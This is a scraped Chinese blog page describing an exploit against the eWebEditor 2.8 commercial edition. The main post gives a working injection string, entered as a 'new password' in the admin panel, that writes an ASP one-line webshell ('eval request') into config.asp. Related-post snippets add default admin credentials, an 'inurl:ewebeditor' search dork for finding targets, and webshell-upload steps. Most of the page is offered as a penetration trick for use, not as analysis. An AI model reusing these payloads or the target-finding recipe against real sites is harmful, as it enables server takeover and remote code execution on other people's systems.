ewebeditor 2.8 后台插上一句话

最新推荐文章于 2021-10-17 21:02:04 发布
最新推荐文章于 2021-10-17 21:02:04 发布
阅读量624 收藏
点赞数
分类专栏: 漏洞收集
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/god_7z1/article/details/6402754
版权
本文介绍如何利用ewebeditor2.8商业版的漏洞,通过修改密码功能,将一句话木马植入配置文件。包括核心步骤及注意事项。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

ewebeditor 2.8 后台插上一句话
影响版本:2.8 商业版
攻击利用:登陆后台,点击修改密码---新密码设置为 1":eval request("a")’
设置成功后,访问asp/config.asp文件即可,一句话木马被写入到这个文件里面了
本文针对ewebeditor商业版本渗透小技巧, 不过我认为有时候有样式的时候 提交不了,。可用这个方法试试。。~~

eWebEditor_V2.8精简版
04-16
无上传功能,无导入功能,无服务器端功能,只有最简化的部分功能. 此版本精致小巧,打开速度只需要V4.6精简版一半的时间不到.
ewebeditor V2.8.0
11-20
ewebeditor V2.8.0 带后台后台用户名admin,密码admin
ewebeditor 2.8 后台
收集盒 Book box
03-11 745
<br /><br />ewebeditor 2.8 后台一句话<br />影响版本:2.8 商业版<br />攻击利用:登陆后台,点击修改密码—新密码设置为 1″:eval request(“a”)’<br />设置成功后,访问http://www.tmdsb.com/ewebeditor/asp/config.asp文件即可,<br />一句话木马被写入到这个文件里面了.
研究EwebEditor2.8中文版
weixin_30721077的博客
01-08 101
很久就打算做一个asp的网页在线编辑器了!可是做去做来,功能还是很不满意!终于找到了EwebEditor但是确实英文的,怎么办?汉化!... ...现在汉化成功了!现在正在使用中... ... 转载于:https://www.cnblogs.com/crane/archive/2006/01/08/313219.html...
修复后的eWebeditor 2.8
09-14
总的来说,eWebeditor 2.8的修复不仅提高了编辑器本身的性能,更关键的是增强了网站后台的安全防护,为用户提供了一个更为稳定、安全的编辑环境。对于使用此编辑器的网站管理员来说,及时升级到2.8版本,可以有效...
eWebEditor2.8升级为UTF-8版本,提供纯净ASP开发服务
1. eWebEditor2.8(UTF-8):eWebEditor是一款流行的网页在线文本编辑器,由eWebSoft公司开发。其主要特点是类似于微软Word的编辑界面,让编辑网页内容变得简单直观。版本2.8是该编辑器的一个更新版本,添加了对UTF-8...
eWebEditor2.8+上传图片编辑器简配版使用指南
eWebEditor2.8+是该编辑器的一个版本号,表明这是一个更新的版本,可能包含新功能或者改进。 ##### 2. 实例功能与特点 标题中提到的实例,是一个用户根据自己的需求和使用经验,对eWebEditor进行了一定定制的版本。...
eWebEditor2.8+超级好实例.rar
06-04
综上所述,"eWebEditor2.8+超级好实例.rar"是一个包含完整图片上传功能、简化后台配置的eWebEditor应用实例,涵盖了文本编辑、图片处理、用户管理和数据库交互等多个方面,对于需要构建在线编辑功能的网站或平台,这...
eWebEditor2.8(UTF-8)
08-21
**eWebEditor2.8(UTF-8)详解** eWebEditor是一款经典的在线HTML编辑器,主要用于网页内容的创建和编辑。它使得用户无需掌握HTML代码就能像在Word中一样编辑网页文本,极大地提升了网站内容的编辑效率。在这个版本中...
ewebeditor6 for jsp 简体中文带后台完整版
08-12
安全说明 ============================= eWebEditor含有后台管理程序,为确保您的程序安全,当您的程序正式上线到服务器上时,请一定注意要修改后台密码,或删除后台管理程序。 1. 修改密码 ----------- 后台网址:(ASP版) http://你的网站/ewebeditor/admin/default.asp (JSP版) http://你的网站/ewebeditor/admin/default.jsp (PHP版) http://你的网站/ewebeditor/admin/default.php (.NET版) http://你的网站/ewebeditor/admin/default.aspx 默认用户:admin 默认密码:admin 用以上默认账号登录后台后,修改密码。注意不要使用简单的密码,要使用强密码,密码长度最好在8位以上。 2. 找回密码 ----------- 您设置的密码保存在以下配置文件中,您可以用记事本程序打开查看。 配置文件:(ASP版) ewebeditor/asp/config.asp (JSP版) ewebeditor/jsp/config.jsp (PHP版) ewebeditor/php/config.php (.NET版) ewebeditor/aspx/config.aspx 3. 删除后台(最佳安全) --------------------- eWebEditor程序是前后台分离的,当您的后台使用完后,您可以把后台程序从服务器上删除,需要时再传上去。 这样可以最好的保证安全,以防止密码被猜解,而通过后台程序的黑客入侵。 删除文件夹:ewebeditor/admin/ 4. 网站安全小常识 ----------------- 一个网站的安全,与这个网站上的任一页程序都有关。只要一个程序页存在安全问题,则可能导致您的整站被黑。 所以,请尽量不要在网站中使用不明来源的程序,不要使用不了解其安全设置方面的程序。
eWebEditor后台登陆.docx
12-04
eWebEditor后台登陆.docx
eWebEditor在线编辑器带后台商业版
09-06
eWebEditor在线编辑器带后台商业版
后台生成一句话 拿shell
weixin_33700350的博客
10-29 226
群里有人发个网站 我就看了下 思路很简单 主要要看对方有什么可以利用的 地址我就不发全了 http://www.xxx.com/ch/index.html 进入后台 后台有点像动易的 看了编辑器 是ew5.5的 没法 被管理员给补了 好吧 我们看下 系统设置 有没有利用的 在设置里我看的一项生成asp 呵呵 这个就可以利用 怎么利用呢 ...
ewebeditor后台通杀漏洞
weixin_34279246的博客
01-12 489
今天看了下ewebeditor php的版本,记得以前看了php版,那个版本比较低,连后台都没 今天下了个3.8的,竟然找出一点令人兴奋的东西出来… php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道 利用方法:首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后...
ewebeditor后台拿shell
weixin_34254823的博客
02-20 505
现在eWebSoft在线编辑器用户越来越多,危害就越来越大~ 首先介绍编辑器的一些默认特征: 默认登陆admin_login.asp 默认数据库db/ewebeditor.mdb 默认帐号admin 密码admin或admin888 搜索关键字:"inurl:ewebeditor" 关键字十分重要 有人搜索"eWebEditor - eWebSoft在线编辑器" 根本搜...
【安全】eWebeditor编辑器上传webshell
qq_43017750的博客
10-17 860
. 环境说明 服务器: IIS6.0 eWebeditor2.8.0 客户机:windows xp 客户机浏览器: IE6.0 二. 漏洞复现 1. 默认口令登录后台 eWebeditor编辑器登录页面:admin_default.asp 默认用户:admin 默认密码:admin 2.新建样式 样式名称:test 路径模式:绝对根路径 显示路径:空 图片类型:gif|jpg|jpeg|bmp|aaspsp 3.样式工具栏 新建工具栏 按钮设置,入或修改图片 4.预览样式上传websh
ewebeditor漏洞利用总结
0ffs3t
02-06 1582
碰到EWEBEDITOR的比较多,找了些资料,以后方便利用 先来说说第一个: 成功登录后台,发现后台很简陋,只有EWEBEDITOR可以利用,但是登陆后台被删除了(admin_login.asp)。 这时我们可以尝试访问 Admin_Style.asp ,看看他能否正常访问,如果能的话,就可以上传shell了。 第二种方法跟第一种有类似之处。 也是登陆页面被“前人”删掉了,或者密
ewebeditor漏洞总结 (从web服务器管理中得到……与大家分享,请不要做坏事)
photon
12-17 3346
ewebeditor漏洞集(劝大家不要做坏事)一、<span class="t_tag" onclick="function onclick(){tagshow(event)}">后台上马<span class="t_tag" onclick="function onclick(){tagshow(event)}">漏洞各位<span class="t_tag" onc
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值